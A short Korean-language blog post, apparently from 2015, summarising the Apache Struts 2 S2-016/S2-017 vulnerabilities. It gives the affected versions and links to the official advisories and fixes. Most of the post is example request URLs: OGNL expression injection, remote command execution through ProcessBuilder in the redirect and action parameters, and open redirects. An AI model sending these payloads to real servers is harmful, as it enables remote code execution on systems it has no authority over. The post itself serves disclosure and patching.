Apache Structs :
Java
EE 웹 애플리케이션을 개발하기 위한 오픈소스 프레임워크로
Apache, WebToBe, iPlanet, WebLogic, WebSphere,
TomCat 등Java
기반 모든 웹/WAS 서버에서 발생 가능함
보안취약 대상 :
Apache Struts 2.0.0 ~ Sturts 2.3.15
http://struts.apache.org/download.cgi#struts 23151
아파치
웹 공식 사이트 해결방안
S2-016: http://struts.apache.org/release/2.3.x/docs/s2-016.html
S2-017: http://struts.apache.org/release/2.3.x/docs/s2-017.html
- Simple Expression - the parameter names are evaluated as OGNL.
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-showcase/employee/save.action?redirect:%25{3*4}
- Command Execution
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','here'})).start()}
http://host/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/
http://host/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23
'IT Tech > Application' 카테고리의 다른 글
| Cloaking 기능 (0) | 2015.10.07 |
|---|---|
| [용어] SSL (0) | 2015.10.04 |
| HTML5 개발표준 및 보안취약점 대응방안은? (0) | 2015.07.10 |
| HTML5의 트렌드는? (0) | 2015.07.10 |
| HTTP 상태 코드 (0) | 2015.04.23 |
